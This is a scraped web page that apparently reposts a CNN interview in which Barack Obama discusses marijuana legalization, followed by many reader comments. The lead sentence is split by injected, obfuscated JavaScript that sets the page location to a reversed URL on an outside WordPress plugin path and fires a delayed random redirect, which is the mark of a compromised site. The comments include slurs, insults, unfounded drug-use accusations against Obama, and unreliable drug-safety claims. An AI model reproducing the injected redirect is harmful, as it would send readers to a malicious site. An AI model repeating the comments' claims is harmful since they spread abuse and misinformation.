Exclusive: Obama talks about pot

President Barack Obama talks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to CNN’s Jake Tapper about marijuana legalization in an exclusive interview.

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45 thoughts on “Exclusive: Obama talks about pot”

  1. Roxana Lopez says:

    i know why they havent banned alcohol or tabaco and drugs CAUSE THEY USE IT IM SO SMART

  2. Kevin Ray says:

    People need to get facts right weed and skunk is 2 different weeds weed won’t damage you but skunk or dro will get it right any one on just weed will not steal or commit crime but alcoholic and hard drugged people will fact!!

  3. 2kool4U_ SamMac says:

    Just remember that video of his daughter hitting the bong…

  4. Jay_ Hawk says:

    I guess politics can just sucker punch god and Mother Nature in the face.

  5. Malachi zb says:

    The interviewer can go fuck himself

  6. StationRussification says:

    Where did Berry get lost along the way to decide power against the people with prohibition – Only as President, Shame 44 Shame.

  7. Smitty Werbenjaegermanjensen says:

    Nobody calls mdma "extacy"….its safer than booze if you use it right.

  8. Camron Mighty says:

    I’m sorry but he sounds stupid asf

  9. the one says:

    This interviewer acknowledged marijuana is scheduled in the same category as heroin, crack….. But doesn't seem to acknowledge that it's less harmful than alchohol or, even cigarettes, that are both legal. It also has more medical benefits than opiods. So of course any rational President would could consider scheduling it amongst other schedule 4 drugs, or legalizing it all together. Btw I don't smoke marijuana, or drink more than 5 times a year.

  10. Idahosuz says:

    I so miss the sanity of this leader.

  11. Miguel Avila says:

    People that are in meth or heroin make us who smoke weed look bad

  12. Anonymous says:

    I bet hes stoned

  13. Hoàng Khang Nguyễn says:

    Thought he was gonna talk about actual flowerpots

  14. Matthew 2700 says:

    Weed is bomb af and helps you forget about your problems

  15. Carolyn Miller says:

    Oh!!!!Damn!!!!MERRYJANE is Awesome!!!!! People dont..even know !!!! What they r talking about !!!Because Alcohol!!!!An pills R the killers!!!!MERRYJANE is Awesome!!!!!

  16. Carolyn Miller says:

    Obama is a good Man!!!!!!

  17. Adrian Zuur says:

    Everything after 2:10 is exactly the current situation with alcohol. Does he really fail to see the double standard?

  18. Pat mahomes Goat says:

    It should not be schedule 1

  19. Cj Me says:

    Thanks now for championing as a MARTYR being thrown out of a Child’s HOME DISNEYLAND for SMOKING WEED there. You’re such a hero and role model.

  20. Hugh Mungus says:

    ombama stinky

  21. Hector Medina says:

    Who’s high right now watching this?

  22. Dee Savage says:

    “BASED ON SCIENTIFIC EVIDENCE” nigga Obama was getting high too lol Stop it

  23. Miguel Diaz says:

    Uhhhh … uhh …. uuhhhhh … uhhhhhhhhh …..uhh

  24. Missy Garrett says:

    marijuana is medicaine not drug!!!! it's not going to kill you. that's my opinon

  25. Anti-HyperLink says:

    Well it doesn't matter what you do, teenagers are gonna drink and smoke weed. They're gonna do it anyway. But teenagers are not kids. That's why they invented that fucking word in the 50s or whatever. 16 year olds smoking weed is fine, 8 year olds smoking weed is not. How exactly is it gonna harm a 16 year old when it doesn't harm an 18 year old (or a 21 year old because the US is fucking retarded)?

  26. thomas vargese says:

    this is the one legalized marijuana
    what is talking and what is doing?

  27. Mike Miller says:

    Nobama is a fucking moron, worst president ever.

  28. infitada says:

    For real, I miss this man…

  29. R Ski says:

    Worst President Ever.

  30. AlDelVex says:

    Yet he smoked weed as a teenager

  31. boxing guy says:

    tells a guy that talk constitutional law. i think its the dea.

  32. Reece Downwithpeace says:

    I love Obama forever my favorite president

  33. Sharon King says:

    Come on barack, you know you're a heavy pot user, cocaine, and crack. the people know, stop with the self righteous BS. You're a fraud. You know your are. Narcissistic pathological liar. You can fool all the people some of the time, and some of the people all the time, but you cannot fool all the people all the time. People Know Barack….

  34. Chris Leslie says:

    Bottom line… he could have pushed for decriminalization but didn't. He's a p.o.s. politician and always will be. Spineless.

  35. bobagopaaa says:

    What kind of V12 block is that?

  36. S4ug3 says:

    Bienvenue au Canada

  37. Sahil Raj says:

    Interview with the President of United States in a damn manufacturing factory?

  38. Daniel Prosser says:

    When I was drunk I was fighting and got arrested when I am high I shake his hand and he's my bestie
    Work it fuckin out people

  39. richard thayer says:

    He thinks that people who sell drugs are victims because the drug trade targets blacks.But it's kind of like when I was dating younger women.I said to a girl in a bar "I date younger women because they like me…and she said are you sure that they like you or is it that YOU like them!"Being poor isn't an excuse and let's face it most of the drug convictions are for weed .

  40. BOLT CLAN says:

    That makes you slower at running

  41. Timothy Poliquin says:

    Obama is such a dumb ass, all we've had for decades is one dumb ass after another now we have the king of all dumb asses in there now. oxy cotton are legal all you need is a doc note and bam legal heroin. but weed is a cat 1 narcotic lol which is right up there with coke and crystal meth lol morons weeds legal and impossible to overdose on lol how many people have died from alcohol in a year lol do the numbers that don't lie. why is there a heroin epidemic in our country ? maybe it's cause it's a legal over the counter drug that our government made legal to the public but weed is still illegal, please make some more sense it sickens me that these are the ones running our country fucking makes me sick

  42. XX 23 says:

    You guys found to be f**** stupid those drugs are man-made this plant is straight from the ground so how the f*** does that come with that Obama shut the fuk up I never did like your dumbass FYI you don't hear bulshit with marijuana you hear accidents with alcohol I am 24 years old and I have never f**** drink in my life because I've seen what it does I am 24 years old and I smoke Vape cartridges concentrate get the f*** out of here you weenie ass

  43. Mush Tacular says:

    Said “uh” 24 times. What a great public speaker.

  44. Ayesha Jasmine says:

    Obama defo smoked a blunt at some point in his life

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